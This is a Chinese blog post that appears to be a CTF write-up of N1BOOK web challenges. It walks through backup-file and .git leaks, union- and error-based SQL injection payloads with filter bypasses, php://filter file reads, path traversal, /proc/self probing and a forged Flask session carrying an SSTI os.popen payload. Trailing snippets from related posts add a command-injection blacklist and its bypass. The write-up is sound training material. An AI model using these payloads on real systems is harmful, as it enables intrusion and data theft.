BUU N1BOOK WEB

最新推荐文章于 2024-10-03 22:21:55 发布
原创 最新推荐文章于 2024-10-03 22:21:55 发布 · 237 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web

文章详细记录了在N1BOOK平台进行的多个web安全挑战,涉及信息收集(如robots.txt,git泄露),SQL注入攻击,以及利用OpenResty框架的漏洞读取flag。作者通过不同方法,如unionselect,文件路径穿越,proc目录读取等,揭示了网络安全中的常见攻防策略。

平时做题记录
N1BOOK上面的web题

N1BOOK第一章

[第一章 web入门]常见的搜集

信息收集
除了 git泄露这些

robots.txt: 记录一些目录和CMS版本信息
readme.md: 记录CMS版本信息,有的甚至有Github地址
www.zip/rar/tar.gz: 往往是网站的源码备份

gedit备份文件 为多一个~
vim备份文件 前面多. 后面多.swp eg: index.php -> .index.php.swp

本题 robots.txt 中存在以下

{
    User-agent: *
Disallow:
/flag1_is_her3_fun.txt
}

进入/flag1_is_her3_fun.txt/

显示flag1:n1book{info_1
肯定还有flag2等

访问 index.php~
flag2:s_v3ry_im

后面flag猜就是import4nt 变形

访问.index.php.swp
下载一个文件,搜到’flag3:p0rtant_hack}’;?>

n1book{info_1s_v3ry_imp0rtant_hack}

[第一章 web入门]粗心的小李

git泄露,访问.git 发现403 没有权限

githack
python GitHack.py http://27eda15c-88cd-47af-85da-a7daabc8bc49.node4.buuoj.cn:81/.git/

[第一章 web入门]SQL注入-1

单引号 #无法注释掉 –+可以

三列,都是三列


回显位置23 好像没什么过滤的。

-1' union select 1,2,database()--+
库名 note

表 fl4g,notes

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g' --+

columns ==fllllag

-1'union select 1,2,group_concat(fllllag) from note.fl4g --+

n1book{union_select_is_so_cool}

[第一章 web入门]SQL注入-2

源码提示报错注入了
1' and extractvalue(1,concat(0x7e,database(),0x7e)) #
1'and (updatexml(1,concat(1,database()),1))#
都可以

note

这里过滤select
1' and updatexml(1,concat(0x7e,(SELect table_name from information_schema.tables where table_schema='note'),0x7e),1) #

显示太长,用group_concat
1' and updatexml(1,concat(0x7e,(seLECT group_concat(table_name) from information_schema.tables where table_schema='note'),0x7e),1) #

fl4g,users

1' and updatexml(1,concat(0x7e,(seLECT group_concat(column_name) from information_schema.columns where table_schema='note'),0x7e),1) #

flag,id,username,passwd‘“

1' and updatexml(1,concat(0x7e,(selECT group_concat(flag,id,username,passwd) from note.fl4g)),1)#
显示表明错误,估计是四个是不同的地方

1' and updatexml(1,concat(0x7e,(selECT group_concat(id,username,passwd) from note.users)),1)#

账户和密码
test,admin
test 26f1c86def93bd19fb3ba6ad3d9
26f1c86def93bd19fb3ba6ad3d9f2a8

1' and updatexml(1,concat(0x7e,(selECT group_concat(flag) from note.fl4g)),1)#

getflag

[第一章 web入门]afr_1

一开始看了下框架 是openresty
找了历史漏洞,发现有目录穿越
结果没用,方向错了

其实很简单,加协议直接读取flag base64解码即可

payload=/?p=php://filter/convert.base64-encode/resource=flag
<?php die(‘no no no’); n1book{afr_1_solved}

[第一章 web入门]afr_2

访问发现一个图片
看一下前端代码发现是本地文件读取
img/img.gif

继续看看img页面

还是openresty框架

访问img../上级目录,得到flag下载
n1book{afr_2_solved}

[第一章 web入门]afr_3

这个题……不是很入门,和CATcat里面的第一题比较类似

linux 系统 proc/self/…

{
    Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。
    /proc/[pid],当查看当前进程的时候可以用/proc/self代替
    cmdline — 启动当前进程的完整命令,但僵尸进程目录中的此文件不包含任何信息
    cwd — 指向当前进程运行目录的一个符号链接
    environ — 当前进程的环境变量列表,彼此间用空字符(NULL)隔开;变量用大写字母表示,其值用小写字母表示
}

http://73235d70-069e-46fa-9c7a-456bb3b3dcd5.node4.buuoj.cn:81/article?name=这里注入

尝试读取下proc相关东西
进入proc/self/environ 发现一串flag


可惜不是flag

进入map页面看到内存区域,不知道能不能像catcat那样读取,待会试试

发现serve进程server.py
进去cwd看看


发现是 python flask框架

有flag.py key.py

flag.py 显示没有权限
key.py 显示#!/usr/bin/python key = ‘Drmhze6EPcv0fN_81Bj-nA’、
有key了
需要linux下

ssti python3 flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

得到session

mem中显示input /output error
不允许读取内存区域
但是不失为一种好方法

N1Book——web
Wking
09-18 1122
一、SSTI 参考链接:CTF|有关SSTI的一切小秘密【Flask SSTI+姿势集+Tplmap大杀器】 - 知乎 (zhihu.com) 先尝试: 发现存在python模板注入,注意不要使用+,网页会出错 根据参考链接,找到 含有 os执行的类, 然后通过 ls , cat 等命令,找到flag,一般在server里 构造payload如下: ?password={{''.__class__.__mro__[1].__subclasses__()[127].__init__.__g..
BUU-N1BOOK-Web
楼阁de猫的博客
12-11 1350
web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李 [第一章 web入门]常见的信息搜集 考查知识点: 1.常规文件:robots.txt 2.gedit备份文件 3.vim备份文件 首先看robots.txt: 访问一下这个文件得到flag1 再看一下原始文件ihdex.php,发现什么都没有,之前用dirsearch扫了很多东西出来,试了/.git发现也不对,这里就看到书上讲到了gedit备份文件,它是以 ~ 为后缀的,试试index.php~,有东西了,拿到flag
BUUCTF】N1BOOK WEB WP
aoao331198的博客
03-29 2344
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 粗心的小李 git泄露,用scrabble工具得到一个网页打开即可 SQL注入-1 SQL注入-2 afr_1 afr_2
【N1BOOK】[第一章 web入门] wp
{OvEr}的博客
11-25 4691
【N1BOOK】[第一章 web入门]常见的搜集 wp 打开页面就是这样的 我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp 扫目录工具dirsearch/御剑,这里我用的是dirsearch。 我们一个个访问一下, 他说flag在/flag1_is_her3_fun.txt,那我们就访问一下 得到第一半flag,继续访问 index.php~ 得到第2半flag,继续访问 .index.php.swp,打开文件 发现第3半flag ..
[CTF夺旗赛] BUUCTF N1BOOK 第二章 web进阶
Da1NtY的博客
08-23 1820
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第二章,后续会陆续更新。
BUU N1BOOK [第二章 web进阶]死亡ping命令
SwBack的博客
09-02 2872
存在以下黑名单过滤 ["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"","'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"]; 但是发现%0a可以执行命令 准备工作 一台具备公网IP的服务器 我这里采用的是自己的服务器,没有服务器的可以注册个小号,在BUU平台开启如下环境 首先在公网服务器上面写入shell文件 内容如下 a=`cat /FLAG` c.
BUU N1BOOK题目死亡ping命令
weixin_48876267的博客
11-30 1128
介绍:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串 version: "3.2" services: converter: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-command:latest ports: - 80:80 本地搭建docker-compose 打开题目 输入127.0.0.1&&id,发现报错。存在恶意字符过滤 抓包进行fuzz扫描测试 fu.
BUUCTF N1BOOK】[第一章 web入门]
最新发布
sleepywin的博客
10-03 669
得到文件 打开搜索flag 可以找到最后的一半flag3:p0rtant_hack}格式:.filename.swap *.swo *.swn。刚开始使用dirsearch本地跑 发现字典不够扫不出index.php~得到一个/flag1_is_her3_fun.txt。得到一半flag2:s_v3ry_im。访问/.index.php.swp。可以通过访问每个目录得到flag。按照提示访问得到flag前半段。也可以使用扫描软件 扫描目录。访问index.php~1.gedit备份文件。
BUUCTF-N1BOOK(web1)学习分享
m0_63641882的博客
11-17 739
访问.index.php.swp使用记事本打开得到flag3拼接起来就可以了。使用GitHack工具进行访问下载index.html文件。访问得到一个txt文件的路径,访问得到半个flag。使用‘进行测试注入类型,发现有回显得知是字符型注入。在本地访问index.html得到flag。进行目录穿越../得到根目录,得到flag。发现flag字样的表进行查询表内的字段。访问index.php~得到flag2。得到flag字段,进行查询字段值。4.php伪协议的使用,目录穿越。使用php伪协议进行文件读取。
N1BOOK 笔记:信息搜集类型题目
skysys的研究小屋
06-01 812
CTF题目中,信息搜集题目方向主要有:敏感备份文件、敏感目录信息、Banner识别等…通过敏感目录泄露可以获得网站的源代码和敏感的URL地址,如网站的后台地址等。基于工具或者自己编写的脚本即可获取源码/flag。 git回滚 git分支 git log只能查看当前branch的修改,如果目标不在当前分支,需要使用更强的工具:GitHacker 然后执行可以看到checkout信息,据此可以查找新分支。如果要还原分支内容,需要手动下载分支的head信息保存到,如执行命令:,恢复好head信息后,复用Gi
BUUCTF--N1BOOK
m0_59022585的博客
07-09 1255
尝试注入'and updatexml(1,concat(0x7e,(seLect group_concat(table_name) from information_schema.tables where table_schema='note'),0x7e),1)#将select关键字绕过,成功回显出表(fl4g和users)。注入'and updatexml(1,concat(0x7e,(seLect group_concat(flag) from fl4g),0x7e),1)#回显出flag。
BUUCTF笔记之N1BOOK
克格莫(有需要的私信)
06-18 5669
1.[第一章 web入门]常见的搜集 robots.txt得到一部分flag: flag1:n1book{info_1 备份文件index.php~得到第二部分flag: flag2:s_v3ry_im 访问.index.php.swp得到第三部分flag: flag3:p0rtant_hack}
BUUCTF-N1BOOK-WP
weixin_42782443的博客
04-05 1508
BUUCTF-N1BOOK-WP[第一章 web入门]常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2afr_3[第二章 web进阶]SSRF Training死亡ping命令XSS闯关文件上传[第三章 web进阶][第四章 CTF之APK章][第五章 CTF之RE章][第六章 CTF之PWN章] [第一章 web入门] 常见的搜集 粗心的小李 SQL注入-1 SQL注入-2 afr_1 afr_2 afr_3 [第二章 web进阶] SSRF Training 死亡ping命令 XSS
buu刷题1.1
ooooohhhhhhh博客
10-28 2495
1.1.1三胖(misc) 下载文件,解压,发现是一个gif, 观察图会发现有人物中参杂红色的flag, 放入ps中,查看图层, 就能得到flag 1.1.2第一章web入门:常见的搜集(N1BOOK) 打开链接发现如下页面,查看源代码什么也没有发现 御剑扫一下后台, 发现robots.php文件,index.php~和.index.php.swp 查看下他的robots.txt文件 出现的文本意思是禁止所有网站访问flag1_is_her3_fun.txt文件
buuctf 常见的搜索
weixin_45711265的博客
01-07 576
buuctf N1book 好久不见,由于之前的博客号忘了,许久没有更新,新开一个重新开始 ok,作为回归的第一篇博客,看看最近新出的 buuctf N1book 第一题 常见的搜索 首先先用dirsearch扫一下 发现:.index.php.swp;robots.txt;index.php~; 访问robots.txt 发现flag1_is_her3_fun.txt 访问 flag1_is_her3_fun.txt 得到 flag1:n1book{info_1 访问index.php~得到 fla
N1Book [第一章 web入门]-sql注入
m0_61368098的博客
08-20 930
重要的数据库:   information_schema   包含MySQL中所有的数据库信息 重要的表:   schemata   mysql中所有数据库的信息   schema_name  所有数据库名   tables   数据库表中的信息   table_schema 记录数据库名    table_name  记录数据表名 columns   列信息 column_name  字段名
N1Book-第二章Web进阶-Web文件上传漏洞
weixin_40872714的博客
03-31 4712
N1Book-第二章Web进阶-Web文件上传漏洞 以下内容转自 https://www.icode9.com/content-4-874265.html <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 //会包含文件pclzip.lib.php,感觉这个php里面是有一些针对zip包进行解压等的操作的 require_once('pclzip.lib.php'); //要是没上传文件,就输出
链接注入解决方法_N1Book WebSQL注入
weixin_39894778的博客
12-09 779
0X00 说明距离上次的笔记隔了很长时间,这段时间在准备一个比赛和一门课的期末考试,其实书上的知识点早就看完了,一直没什么时间整理,因此拖到现在,下次的笔记可能还要拖了,又要准备下一周的考试了。本期的笔记就是在网页经常存在的SQL注入的基础知识点和注入的办法,其实书上讲的很详细还有注入点的位置,我这就没有写出来。0X01 笔记一、SQL注入基础1.数字型注入一般都是通过HTTP的GET方...
《从0到1:CTFer成长之路》--afr_1 BUUCTF
wuyaowangchuan的博客
11-17 4202
任意文件读取漏洞 发现了?p=hello,然后页面回显了hello world 因为提示了是文件读取漏洞 没有回显 因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀 php的filter读取一下 ?p=php://filter/read=convert.base64-encode/resource=flag PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 base64解码 n1book{afr_1_solv.
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值